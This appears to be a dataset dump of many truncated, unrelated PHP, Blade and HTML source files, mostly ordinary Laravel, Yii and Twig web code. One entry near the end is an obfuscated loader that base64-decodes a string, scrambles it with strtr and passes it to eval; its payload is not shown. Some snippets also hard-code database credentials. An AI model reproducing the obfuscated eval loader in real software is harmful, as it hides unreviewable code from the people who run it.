text
stringlengths
2
1.03M
<?php /** * A Class for handling iCalendar data. * * When parsed the underlying structure is roughly as follows: * * iCalendar( array(iCalComponent), array(iCalProp) ) * * each iCalComponent is similarly structured: * * iCalComponent( array(iCalComponent), array(iCalProp) ) * * Once parsed, $ical->component will po...
<?php declare(strict_types=1); namespace SofortPay\Tests\ValueObject; use PHPUnit\Framework\TestCase; use SofortPay\ValueObject\TransactionID; use SofortPay\Exception\InvalidTransactionIDException; /** * Class TransactionIdTest. */ class TransactionIdTest extends TestCase { /** * @throws InvalidTransacti...
<?php /** * Created by PhpStorm. * User: Genius * Date: 2018/12/22 * Time: 15:23 */ $link = mysqli_connect("localhost","yyj","yyj12345","mydatabase"); if($link){ $sql="select CB_num,CB_phonenum,CB_shop_name from 商家黑名单"; // $sql = "select * from shop"; mysqli_query($link,"set NAMES UTF8"); $result =...
<?php session_start(); include "../fungsi/koneksi.php"; include "../fungsi/fungsi.php"; $tahunSekarang = date('Y'); if (!isset($_SESSION['username']) || $_SESSION['level'] != 'direktur') { header("location: ../index.php"); } if (isset($_GET['divisi']) && isset($_GET['tahun'])) { $divisi = dekripRambo($_GET['...
@extends('master') @section('content') <script src="https://code.jquery.com/jquery-1.12.4.min.js"></script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> <script> // $(document).ready(function(){ // $(".field").change(function(){ // alert("ok") // }); // }); $(documen...
<?php /** @var \Illuminate\Database\Eloquent\Factory $factory */ use App\User; use Faker\Generator as Faker; use Illuminate\Support\Str; /* |-------------------------------------------------------------------------- | Model Factories |-------------------------------------------------------------------------- | | Thi...
<?php if (isset($this->params['css']) && ($this->params['css'] !== false)): ?> [?php use_stylesheet('<?php echo $this->params['css'] ?>', 'first') ?] <?php elseif(!isset($this->params['css'])): ?> [?php use_javascript('//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js', 'first') ?] [?php use_javascript('<...
<!DOCTYPE html> <html lang="{{ app()->getLocale() }}"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <title>@yiel...
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; class Caja extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('caja', function (Blueprint $t...
<?php use yii\helpers\Html; use yii\grid\GridView; /* @var $this yii\web\View */ /* @var $dataProvider yii\data\ActiveDataProvider */ $this->title = 'Productos'; $this->params['breadcrumbs'][] = $this->title; ?> <div class="productos-index"> <h1><?= Html::encode($this->title) ?></h1> <p> <?= Html::...
@extends('layouts.application') @section('title') @if (in_array('1',request()->segments())) @lang('app.Executive Director') @elseif (in_array('2',request()->segments())) @lang('app.General Director') @elseif (in_array('3',request()->segments())) @lang('app.Humman Resuorce Direct...
<!--Noa Pereira Prada Schnor - Web Applications Project - May 2018. Logout function. <?php session_start() ; // Destroy all the active sessions session_destroy() ; // Page after the redirection $redirect = "index.php?nocache=".time(); //Below the function header() with the attribute location: it points out the $red...
<!-- DataTable Bootstrap --> <link href="https://cdn.datatables.net/1.10.20/css/jquery.dataTables.min.css" rel="stylesheet"> <link rel="stylesheet" href="https://cdn.datatables.net/buttons/1.6.1/css/buttons.dataTables.min.css">
<?php /** * @package, content */ /** * The AjaxParameters returns an JSON array of all available parameters. */ require_once(TOOLKIT . '/class.datasourcemanager.php'); Class contentAjaxParameters extends AjaxPage { public function view() { $params = array('{$today}', '{$current-time}', '{$this-year}'...
<?php namespace App\Http\Controllers; use App\Http\Requests\HolidayPostRequest; use App\Models\Holiday; class HolidayController extends Controller { /** * Display a listing of the resource. * * @return \Illuminate\Http\Response */ public function index() { $holidays = H...
<div class="content-wrapper"> <div class="content-header"> <div class="container-fluid"> <div class="row mb-2"> <div class="col-sm-6"> <h1 class="m-0 text-dark">Analisis Topik : Perkelas</h1> </div> <div class="col-sm-6"> <ol class="breadcrumb float-sm-right"> ...
<?php namespace app\lform\service; use think\facade\Db; /** * 数据库管理类 * * @create 2019-11-3 * @author deatil */ class Datatable { protected $table; /*数据库操作的表*/ protected $fields = array(); /*数据库操作字段*/ protected $charset = 'utf8mb4'; /*数据库操作字符集*/ public $prefix ...
<?php use Illuminate\Http\Request; use Illuminate\Support\Facades\Route; use App\Http\Controllers\API\ApiController; use App\Http\Controllers\API\AuthController; /* |-------------------------------------------------------------------------- | API Routes |----------------------------------------------------------------...
@extends('layouts.master') @section('content') <!doctype html> <html class="no-js" lang=""> <body> <div class="pages-title section-padding"> <div class="container"> <div class="row"> <div class="col-xs-12"> ...
<?php /* TwigBundle:Exception:traces.txt.twig */ class __TwigTemplate_e123f6c18d35cd0fd72a87a69204baad942d778f334476dfb0fe7e38fe871582 extends Twig_Template { public function __construct(Twig_Environment $env) { parent::__construct($env); $this->parent = false; $this->blocks = array( ...
<?php session_start(); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Danh sách kỳ thi</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <link rel="stylesheet" href="style.css"...
@extends('layouts.app') @section('content') <div class="container"> <h2>Clients</h2><br/> <div class="row"> <div class="col-lg-12 margin-tb"> <div class="pull-left"> <h2>Add New Client</h2> </div> <div class="pull-right"> <a class="btn...
<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ declare(strict_types=1); namespace Magento\Swagger\Api\Data; use Magento\Framework\View\Element\Block\ArgumentInterface; /** * Swagger Schema Type. * * @api * @since 100.2.4 */ interface SchemaTypeInterface ...
<?php namespace LaravelEnso\Tables\app\Services\Template\Builders; use LaravelEnso\Helpers\app\Classes\Obj; use LaravelEnso\Tables\app\Attributes\Style as Attributes; class Style { private $template; private $defaultStyle; public function __construct($template) { $this->template = $template;...
<?php use Illuminate\Database\Seeder; use Illuminate\Support\Facades\DB; class LecturersTableSeeder extends Seeder { public function run() { DB::table('lecturers')->insert([ [ 'surname' => 'Петров', 'name' => 'Иван', 'patronymic' => 'Сергееви...
<?php session_start(); if($_SESSION['user_id'] == "") { echo "Please Login!"; header("location:index.php"); } error_reporting(0); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, init...
<?php namespace Application\Block\Search; use Concrete\Core\Attribute\Key\CollectionKey; use Database; use CollectionAttributeKey; use Concrete\Core\Page\PageList; use Concrete\Core\Block\BlockController; use Page; use Core; use Request; class Controller extends BlockController { protected $btTable = 'btSearch'; ...
<?php /** * 示例接口名称:pdd.goods.sizespec.template.update */ require_once dirname(__FILE__).'/Config.php'; require_once dirname(__FILE__)."/../vendor/autoload.php"; use Com\Pdd\Pop\Sdk\PopHttpClient; use Com\Pdd\Pop\Sdk\Api\Request\PddGoodsSizespecTemplateUpdateRequest; $client = new PopHttpClient(Config::$clientId, Conf...
<?php namespace App\Http\Controllers\Student; use App\Http\Controllers\Controller; // using controller class use Illuminate\Http\Request; use App\Http\Requests; use App\Model\student; use DB; use Input; use Redirect; use Session; use Auth; use Mail; use Illuminate\Support\Facades\Validator; class ChatController exten...
<?php /** * Created by PhpStorm. * User: christian.me * Date: 4/29/2016 * Time: 11:16 AM */ namespace Customer\Controller; use Zend\Mvc\Controller\AbstractActionController; use Zend\View\Model\ViewModel; class CustomerController extends AbstractActionController { private $errorRegMessage; public fu...
@extends('backend.dashboard') @section('title','Trang chủ quản trị') @section('contend') <section id="main-content"> <section class="wrapper"> <!-- //market--> <div class="market-updates"> <div class="col-md-3 market-update-gd"> <div class="market-update-block clr-block-2"> <div class="col-md-4 market-...
<?php namespace SystemDirectory\Console\Commands; use Illuminate\Console\Command; use Illuminate\Foundation\Inspiring; class Inspire extends Command { /** * The name and signature of the console command. * * @var string */ protected $signature = 'inspire'; /** * The console comm...
<!DOCTYPE html> <html lang="{{ str_replace('_', '-', app()->getLocale()) }}"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content="William Maddicott is an experienced freelance web developer and Designer based in Meanwo...
<!DOCTYPE html> {{--ログイン関連親レイアウト--}} <html> <head> <title>@yield('title')</title> {{-- その他CDN読み込み --}} <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.19.0/jquery.validate.js"></script> ...
<?php /** * Created by PhpStorm. * User: khaliddabjan * Date: 2/20/18 * Time: 2:39 PM */ namespace src\Lists; class Node { public $data; public $next; public function __construct($data) { $this->data = $data; $this->next = null; } }
<?php namespace Dcux\Cache\Action\Js; use Autoloader; use Lay\Advance\Util\Utility; use Lay\Advance\Util\Logger; use Lay\Advance\Core\App; use Dcux\Cache\Kernel\CAction; use Assetic\Asset\AssetCollection; use Assetic\Asset\FileAsset; use Assetic\Asset\GlobAsset; use Assetic\Filter\JSMinFilter; class Underscore ext...
<div class="profile"> <div class="profile_pic"> <img src="{{asset('admin/images/img.jpg')}}" alt="..." class="img-circle profile_img"> </div> <div class="profile_info"> <span>Welcome,</span> </div> </div>
<?php /** * Edit links form for inclusion in administration panels. * * @package WordPress * @subpackage Administration */ // Don't load directly. if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } if ( ! empty( $link_id ) ) { /* translators: %s: URL to Links screen. */ $heading = sprintf( __( '<a href="%s">...
<?php use Illuminate\Support\Facades\Schema; use Illuminate\Database\Schema\Blueprint; use Illuminate\Database\Migrations\Migration; class CreateVisitsTable extends Migration { /** * Run the migrations. * * @return void */ public function up() { if(!Schema::hasTable('visits')) ...
<?php ob_start(); $page_title = 'Edit Account'; require_once('includes/load.php'); page_require_level(3); ?> <?php //update user image if(isset($_POST['submit'])) { $photo = new Media(); $user_id = (int)$_POST['user_id']; $photo->upload($_FILES['file_upload']); if($photo->process_user($user_id)){ $...
@extends('layouts.client') @section('content') <!-- Page wrapper --> <!-- ============================================================== --> <div class="page-wrapper"> <!-- ============================================================== --> <!-- Bread crumb and right sidebar toggle --> <!-- ===============...
@extends('laravel_dashboard.layout') @section('title') Sales @stop @section('content') <sales></sales> @stop
<div class="container"> <hr class="hidden-xs" width="68%" align="left"> <br class="visible-xs"> <fieldset class="bingkai visible-xs"> <legend align="center" class="jd-bingkai" style="font-size:20px"><strong>Belanja Berdasarkan Harga</strong></legend> <select class="form-control" id="cari-harga" onChange="window....
<?php namespace Cisse\Bundle\TraitsBundle\Entity\Annotation\NotUnique\NotNullable\Text; use Doctrine\ORM\Mapping as ORM; trait ImageTrait { /** * @ORM\Column(type="text", unique=false, nullable=false) */ protected string $image; public function getImage(): string { return $this->im...
<?php /* MIT License Copyright (c) 2017 Igor Kroitor Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, pu...
<?php namespace App\Http\Requests; use Illuminate\Foundation\Http\FormRequest; class CreateRolRequest extends FormRequest { /** * Determine if the user is authorized to make this request. * * @return bool */ public function authorize() { return true; } /** * Get ...
@extends('layouts.master') @section('content') <stokiest-init :stokiest="{{$stokiest}}"></stokiest-init> <div class="content-wrapper"> <section class="content-header"> <h1>{{$stokiest->name}}</h1> <ol class="breadcrumb"> <li><a href="{{url('/stokiest')}}"><i class="fa fa-building"></i> Stoki...
<?php /* uniMarcaBundle:noticias:responderTitulo.html.twig */ class __TwigTemplate_8ce1acee2eecb2f6c2c51be6e788a21545e031894cb192c233ca6701e77889a3 extends Twig_Template { public function __construct(Twig_Environment $env) { parent::__construct($env); $this->parent = $this->env->loadTemplate("...
<?php namespace SlimApiTest\Command; use SlimApi\Command\InitDbCommand; use Symfony\Component\Console\Application; use Symfony\Component\Console\Tester\CommandTester; class InitDbCommandTest extends \PHPUnit_Framework_TestCase { use \SlimApiTest\DirectoryTrait; protected $tester; protected $command; ...
<?php namespace App\Http\Controllers; use App\Models\Letak; use App\Models\Kategori; use Illuminate\Http\Request; use Redirect; use Session; use Illuminate\Support\Facades\DB; use Illuminate\Support\Facades\Validator; use Illuminate\Support\Facades\Input; class LetakController extends Controller { /** * Dis...
<?php require_once ('com/gmo_pg/client/output/BaseOutput.php'); /** * <b>口振セレクト請求情報変更 出力パラメータクラス</b> * * @package com.gmo_pg.client * @subpackage output * @see outputPackageInfo.php * @author GMO PaymentGateway */ class BankaccountChangeOutput extends BaseOutput { /** * @var string オーダーID */ private $orde...
<?php /** * BlogAuthor filter form. * * @package symfony12 * @subpackage filter * @author Your name here * @version SVN: $Id: BlogAuthorFormFilter.class.php 23668 2009-11-07 12:51:07Z Kris.Wallsmith $ */ class BlogAuthorFormFilter extends BaseBlogAuthorFormFilter { /** * @see AuthorFormFilter ...
<?php namespace Drupal\Tests\views\Functional\Plugin; use Drupal\menu_link_content\Entity\MenuLinkContent; use Drupal\Tests\views\Functional\ViewTestBase; /** * Tests the menu links created in views. * * @group views */ class MenuLinkTest extends ViewTestBase { /** * Views used by this test. * * @var...
<?php /** * Created by PhpStorm. * User: tanzhenxing * Date: 2018/5/21 * Time: 6:42 */ namespace app\common\model; use think\Model; class SysSet extends Model { }
<?php /** * Created by PhpStorm. * User: jkirkby91 * Date: 10/03/2016 * Time: 16:34 */ namespace UniApi\Common\Exception\Http\ServerErrors; use UniApi\Common\Exception\HttpException; class InternalServerErrorException extends HttpException { }
<!-- resources/views/tasks.blade.php --> @extends('layouts.app')<!-- обращение к views/layouts/app.blade.php --> @section('content') <!-- Текущие товары --> @if (count($goods) > 0) <div class="panel panel-default"> <div class="panel-heading"> Товары </div> <div class=...
<?php /* * Copyright 2007 ZXing authors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
<?php namespace seregazhuk\HeadHunterApi\EndPoints; use seregazhuk\HeadHunterApi\Traits\HasAll; class Industries extends Endpoint { use HasAll; const RESOURCE = 'industries'; }
<?php namespace Database\Seeders; use Illuminate\Database\Seeder; class EatGrpMemberSeed extends Seeder { /** * Run the database seeds. * * @return void */ public function run() { // } }
<?php /** * Created by PhpStorm. * User: Iulian * Date: 19/10/2017 * Time: 20:39 */ namespace App\Library\Classes; use App\Game; use App\Player; class Teams{ public static function getGames(){ $games = Game::get(); $gamesCollection = collect(); foreach( $games as $game ){ $gamesCollection->push(se...
<?php use yii\helpers\Html; use yii\widgets\DetailView; /* @var $this yii\web\View */ /* @var $model backend\models\Golongan */ $this->title = $model->kode_golongan; $this->params['breadcrumbs'][] = ['label' => 'Golongans', 'url' => ['index']]; $this->params['breadcrumbs'][] = $this->title; \yii\web\YiiAsset::regist...
<!--<script language="JavaScript" type="text/javascript" src="<?php echo base_url() . "datatables/media/js/jquery.dataTables.editable.js" ?>"></script> <script language="JavaScript" type="text/javascript" src="<?php echo base_url() . "datatables/media/js/jquery.jeditable.js" ?>"></script>--> <script> var built_pal...
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class Shipping extends Model { public $timestamps=false; protected $fillable=[ 'shipping_name','shipping_address','shipping_phone','shipping_email','shipping_notes','shipping_met...
<x-app-layout> <x-slot name="title">{{ __('Edit regulated entity “:name”', ['name' => $entity->name]) }}</x-slot> <x-slot name="header"> <h1> {{ __('Edit regulated entity “:name”', ['name' => $entity->name]) }} </h1> </x-slot> <!-- Form Validation Errors --> @include('pa...
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed'); class Model_alias extends CI_Model { function __construct() { parent::__construct(); } function getListAlias($cond = null){ $query = "SELECT alias_id, alias_category, key_id, web_alias, web_ori, alias_active...
@extends('admin.layout.template') @section('title', 'biograpy') @section('content') <!-- Page Wrapper --> <div id="wrapper"> @include('admin.layout.sidebar') <!-- Content Wrapper --> <div id="content-wrapper" class="d-flex flex-column"> <!-- Main Content --> <div id="content"> ...
<?php /** * Copyright (C) 2015-2020 Virgil Security Inc. * * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * (1) Redistributions of source code must retain the above copyright * ...
<?php declare(strict_types=1); namespace Arkitect\Tests\Unit\Expressions; use Arkitect\Expression\PositiveDescription; use PHPUnit\Framework\TestCase; class PositiveDescriptionTest extends TestCase { public function test_it_should_create_positive_description(): void { $description = 'should [depend|...
<?php use Illuminate\Support\Facades\Route; /* |-------------------------------------------------------------------------- | Web Routes |-------------------------------------------------------------------------- | | Here is where you can register web routes for your application. These | routes are loaded by the Route...
<?php /** * @author Mohammed Moussaoui * @copyright Copyright (c) Mohammed Moussaoui. All rights reserved. * @license MIT License. For full license information see LICENSE file in the project root. * @link https://github.com/DevNet-Framework */ namespace DevNet\Core\Configuration; interface IC...
<?php return [ 'view_index_add_type' => 'Tipo de página', 'view_index_type_page' => 'Página', 'view_index_type_module' => 'Módulo', 'view_index_type_redirect' => 'Encaminhamento', 'view_index_as_draft' => 'Como modelo', 'view_index_as_draft_help' => 'Deseja definir a nova página como um modelo?...
<?php use App\Http\Controllers\Api\AddressController; use App\Http\Controllers\Api\CartController; use App\Http\Controllers\Api\CategoryController; use App\Http\Controllers\Api\OrderController; use App\Http\Controllers\Api\PaymentController; use App\Http\Controllers\Api\ProductController; use App\Http\Controllers\Api\...
<?php use Illuminate\Database\Schema\Blueprint; use Illuminate\Database\Migrations\Migration; class CreateZonesTable extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('zones', function(Blueprint $table) { $table->increments(...
<html> <head> <title>ItemID To SKU Lookup Result</title> </head> <body> <?php $idErr = $mfidErr = ""; $id = $mfid = ""; if ($_SERVER["REQUEST_METHOD"] == "POST") { if (empty($_POST["id"])) { $idErr = "Gotta have an itemid!"; $id = "0"; }else { $id = test_input($_POST["id"]); }...
<?php /* |-------------------------------------------------------------------------- | Create The Application |-------------------------------------------------------------------------- | | The first thing we will do is create a new Laravel application instance | which serves as the "glue" for all the components of La...
<a href="<?= site_url($config->headerBackButton) ?>" class="btn btn-warning my-2 my-sm-0">Back</a>
<?php namespace common\models\mysql; use Yii; /** * This is the model class for table "user_action". * * @property int $id * @property int $user_id * @property int $date * @property int $adept_id * @property int $first_time * @property int $last_time * @property string $status * @property string $descripti...
<?php return [ /* |-------------------------------------------------------------------------- | Authentication Defaults |-------------------------------------------------------------------------- | | This option controls the default authentication "guard" and password | reset options for y...
<?php // Heading $_['heading_title'] = 'Banner'; // Text $_['text_success'] = 'Berhasil: Anda telah mengubah banner!'; $_['text_list'] = 'Daftar Banner'; $_['text_add'] = 'Tambah Banner'; $_['text_edit'] = 'Mengubah Banner'; $_['text_default'] = 'Standar'; // Column $_['co...
<?php declare(strict_types = 1); namespace ModuleBigdata\Repositories; class OrderGoodsRepository extends AbstractRepository { protected function _sceneFields() { return [ 'list' => ['id', 'name'], 'listSearch' => ['id', 'name'], 'add' => ['name'], 'upd...
@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-betwee...
@extends('layouts.app') <br> <br> <br> @section('content') <div class="container"> <div class="row"> <div class="col-md-8 col-md-offset-2"> <div class="panel panel-default"> <div class="panel-heading">Terminar</div> <div class="panel-body"> <f...
<nav class="navbar navbar-default navbar-fixed-top" role="navigation"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#navbar-brand-centered"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> ...
<?php namespace App\Orm\Entity; use Doctrine\ORM\Mapping as ORM; /** * @ORM\Entity() */ class LobbyManager { /** * @ORM\Id() * @ORM\Column(type="string") */ private $name; /** * @ORM\Column(type="string") */ private $callbackUrl; /** * @ORM\Column(type="string") ...
<?php namespace App; trait PageTemplates { /* |-------------------------------------------------------------------------- | Page Templates for Backpack\PageManager |-------------------------------------------------------------------------- | | Each page template has its own method, that define w...
<?php namespace Intervention\Validation\Test\Rules; use Intervention\Validation\Rules\Lowercase; use Intervention\Validation\Traits\CanValidate; use PHPUnit\Framework\TestCase; class LowercaseTest extends TestCase { use CanValidate; /** * @dataProvider dataProvider */ public function testValida...
<?php $__env->startSection('content'); ?><p>Ominous images captured by passengers aboard planes above the skies of California show them flying through daunting clouds of smoke thousands of feet above ground as devastating wildfires continue to rage across the state.</p> <p>A Twitter user, identified as Gabriela, captu...
<?php namespace Analysis\Service; use Analysis\Entity\Criterion\CriterionDateCreated; use Analysis\Entity\Criterion\CriterionExchange; use Analysis\Entity\FigureAnalysis; use Analysis\Entity\MoexFigureAnalysis; use Analysis\Entity\TaskOvertimeAnalysis; use Analysis\Entity\TaskPercentAnalysis; use Analysis\Validator\С...
<?php $con=mysqli_connect("localhost", "root", "") or die (mysqli_error()); $mysqli = new mysqli('localhost','root',"",'library'); //mysqli_select_db($con,'online') or die(mysqli_error($con)); if ($mysqli->connect_error) { die('Error : ('. $mysqli->connect_errno .') '. $mysqli->connect_error); } ?>
<?php use yii\helpers\Html; use yii\widgets\DetailView; /* @var $this yii\web\View */ /* @var $model common\models\EntpSales */ $this->title = $model->sales_id; $this->params['breadcrumbs'][] = ['label' => 'My Sales', 'url' => ['index']]; $this->params['breadcrumbs'][] = $this->title; ?> <div class="entp-sales-view"...
<?php namespace App\Http\Controllers; use App\Models\Slider; use DataTables; use Image; use Validator; use Illuminate\Http\Request; class SliderController extends Controller { public function be_page_slider() { return view('be.be_slider'); } public function be_slider_data(Request $request) ...
<?php $_X=base64_decode($_X);$_X=strtr($_X,'SgPO9YZWFKmqyfxcjLJRzuM5vNts1b.{B4nC]i/2Dl0EheA [d8=Qp>VXo H}6GIw7ka3TrU<','=R9odmplAEPyk8gv[53xrMezqZHi7YhW<DsG{>CcX}1N/afj6]JtuS .BUnwVKLQO20ITF4b');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
<?php namespace SmallRuralDog\Admin\Components\Grid; use SmallRuralDog\Admin\Components\GridComponent; class Image extends GridComponent { protected $componentName = "IImage"; protected $src; protected $host = ""; protected $fit = "cover"; protected $lazy = false; protected $scrollContainer...
<?php namespace Omnipay\Neteller\Message; /** * Neteller Abstract Response. * * @author Alexander Fedra <contact@dercoder.at> * @copyright 2016 DerCoder * @license http://opensource.org/licenses/mit-license.php MIT */ abstract class AbstractResponse extends \Omnipay\Common\Message\AbstractResponse { /*...
<?php App::uses('Component', 'Controller'); class SynchroDossierComponent extends Component { public $canViewQuota = null; public $helperName = 'SynchroDossier.SynchroDossier'; public function initialize(Controller $controller) { $this->__checkSsl($controller); $this->setCanViewQuota($controller); $contro...
<section class="content-header"> <h1> Stock Out <small>Barang Keluar</small> </h1> <ol class="breadcrumb"> <li><i class="fa fa-dashboard"></i></a></li> <li>Transaction</li> <li class="active">Stock Out</li> </ol> </section> <!-- Main content --> <section class="content"> <?php $this->view('mes...
<div class="modal-dialog modal-lg" role="document"> <div class="modal-content"> <div class="modal-header"> <h4 class="modal-title" >{{$vending_machine->name}}</h4> </div> <div class="col-lg-12" id="form-item"> <form id="form-item-maintenance-activity"> ...
<?php namespace Illuminate\Foundation\Auth; use Illuminate\Http\Request; use Illuminate\Support\Facades\Auth; use Illuminate\Validation\ValidationException; trait AuthenticatesUsers { use RedirectsUsers, ThrottlesLogins; /** * Show the application's login form. * * @return \Illuminate\Http\Re...
<?php namespace App\Modules\System\Controllers; use Nova\Config\Config; use App\Core\Controller; use Cookie; use Redirect; use Session; class Language extends Controller { /** * Change the Framework Language. */ public function change($language) { $languages = Config::get('languages'...
<?php namespace App\Http\Controllers; use Illuminate\Http\Request; use DB; use Redirect; use App\Papers; use Auth; class AdminPapersController extends Controller { public function __construct() { $this->middleware('auth:admin'); } public function index($staffId) { $papers = DB::ta...